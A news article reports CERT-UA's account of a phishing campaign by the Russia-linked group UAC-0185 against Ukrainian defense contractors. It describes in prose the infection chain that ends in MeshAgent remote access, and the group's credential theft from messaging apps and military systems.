Hackers linked to the Russian state allegedly attack Ukrainian defense contractors
Ukraine has said threat actors linked to the Russian state have been targeting its defense contractors.
The Ukrainian Computer Emergency Response Team (CERT-UA) published a report saying that a group called UAC-0185 had been sending emails containing malicious links to employees of Ukrainian defense contractors and defense forces.
According to CERT-UA, the threatening group posed as the Ukrainian Union of Industrialists and Entrepreneurs, claiming to be inviting staff to a real conference that discussed the transition of Ukrainian defense products to NATO standards that was held on the 5th. November.
The emails then contained a link that the threat actors said granted access to information about the invitation, but instead downloaded a file called “list_02-1-437.lnk.”
“Opening the LNK file will download and run the ‘start.hta’ file using the standard mshta.exe utility,” CERT-UA said.
“The mentioned HTA file contains JavaScript code designed to execute two PowerShell commands, one of which will download and open a bait file in the form of a USPP letter, and the second of which will download the ‘Front.png’ file, which is a ZIP file. file containing three files: ‘Main.bat’, ‘Registry.hta’ and ‘update.exe’, extract the contents of the file to the Directory ‘%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\’ and start the BAT file ‘Main .bat’.
“The latter will move the ‘Registry.hta’ file to the autorun directory, run it and delete some of the downloaded files from the computer.
“Finally, ‘Registry.hta’ will start ‘update.exe’, which is classified as a MESHAGENT remote control program.”
The malware contained in the files used was reportedly used in cyberattacks since early 2023.
While Ukraine did not name Russia as behind the attacks, SentinelOne connected UAC-0185, also known as UNC4221, to the Russian government earlier this year.
The group has been active since at least 2022, according to CERT-UA, and focuses on stealing credentials from Signal, Telegram, WhatsApp, and various military systems such as DELTA, TENETA, and Kropyva.
“At the same time, to a more limited extent, cyber attacks are being carried out aimed at obtaining unauthorized remote access to the computers of employees of the enterprises of the defense industrial complex, as well as the Ukrainian Defense Forces, using hacking tools. specialized software, in particular, MESHAGENT and ULTRAVNC,” said CERT-UA.